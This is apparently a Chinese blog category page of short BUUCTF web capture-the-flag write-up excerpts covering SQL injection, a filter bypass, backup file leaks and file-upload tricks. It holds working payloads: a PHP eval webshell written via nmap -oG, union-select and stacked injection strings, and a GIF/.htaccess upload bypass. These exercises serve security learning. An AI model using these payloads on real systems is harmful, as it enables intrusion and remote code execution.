![](https://img-blog.csdnimg.cn/20201014180756780.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
buuctf web
buuctf web
0d@y
这个作者很懒,什么都没留下…
展开
-
[BUUCTF 2018]Online Tool PHP代码审计
[BUUCTF 2018]Online Tool PHP代码审计题目一开始的一段代码这里的知识点是nmap -oG 可以写入文件例如: nmap <?php eval($_POST['cmd']); ?> -oG 1.php这里是host传参,但是不能直接写入,因为前面有两个函数过滤单引号之类的特殊字符escapeshellarg的用处是有单引号就会在前面加个\转义,并且将两边的字符用单引号括起来,例如:$host = "a'";escapeshellarg($host);ec原创 2020-08-13 11:38:57 · 240 阅读 · 0 评论 -
[GXYCTF2019]BabySQli sql注入
[GXYCTF2019]BabySQli sql注入1、输入单引号’2、猜有多少字段1’ order by 3#看来又过滤,那就用bp抓包fuzz导入字典3、经测试过滤了or order =等字符,但是没有过滤union select,可以通过select猜有多少字段1’ union select 1,2,3,4#1’ union select 1,2,3# ,返回wrong user,说明有三个字段但是在源代码中有一串数字MMZFM422K5HDASKDN5TVU3S原创 2020-08-12 00:56:02 · 716 阅读 · 0 评论 -
BUUCTF web 随便注 sql注入 mysql预处理语句
BUUCTF web 随便注 sql注入 mysql预处理语句开始的页面查询1按照手工检测sql注入点步骤1、判断注入点1' or 1=1#1' or 1=2#两次结果不一样,说明存在sql注入2、判断有多少字段1' order by 3#返回错误1' order by 2#正常,说明有2个字段3、查询数据库-1' union select 1,database()#这里过滤了很多关键字,不能用select,update之类的关键字,4、堆叠注入在sql中,分号;是用来原创 2020-08-01 15:18:13 · 391 阅读 · 0 评论 -
buuctf web [强网杯 2019]高明的黑客
buuctf web [强网杯 2019]高明的黑客开始的页面既然页面上有提示,我们就输入www.tar.gz有文件压缩包,我们下载下来,压缩打开后,有几千个文件这里我们随便打开一个文件,这里有很多shell,但是很多是用不了的,所以要用python来测试,不可能手动import requestsimport osimport reimport threadingimport timesession = requests.Session() session.keep_原创 2020-07-20 01:40:29 · 651 阅读 · 0 评论 -
buuctf web [ACTF2020 新生赛]BackupFile
buuctf web [ACTF2020 新生赛]BackupFile开始的页面先在源代码中查看有什么信息啥信息都没有题目的提示是backupFile备份文件备份文件一般的后缀名为.rar.zip.7z.tar.gz.bak.swp.txt.html.bak这里的备份文件是index.php.bak,可以用dirsearch扫描链接: dirsearch.<?phpinclude_once "flag.php";if(isset($_GET['key']原创 2020-07-18 21:55:56 · 1160 阅读 · 0 评论 -
buuctf web [极客大挑战 2019]BabySQL
buuctf web [极客大挑战 2019]BabySQL开始的页面随便输入用户名和密码sql注入,先判断有多少字段从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误3个字段,成功?username=admin&password=123%27ununionion selselectect 1,2,3%20%23爆库 ?username=admin&原创 2020-07-16 20:41:04 · 929 阅读 · 0 评论 -
buuctf web 13、[SUCTF 2019]CheckIn
buuctf web 13、[SUCTF 2019]CheckIn开始的页面1、 先上传一个正常的照片2、再上传一个php文件,提示illegal suffix3、上传一个只含一句话木马的后缀为gif的文件,提示内容中有<?既然过滤了<? ,所以用4、上传7.gif,但是提示不是gif类型,exif_imagetype是文件内容的头部看是否是对应的照片类型我们只需要再文件中填写对应的照片头部上传成功5、但是要怎么样才能让照片木马执行,我们想到.htaccess原创 2020-07-16 00:27:40 · 1071 阅读 · 0 评论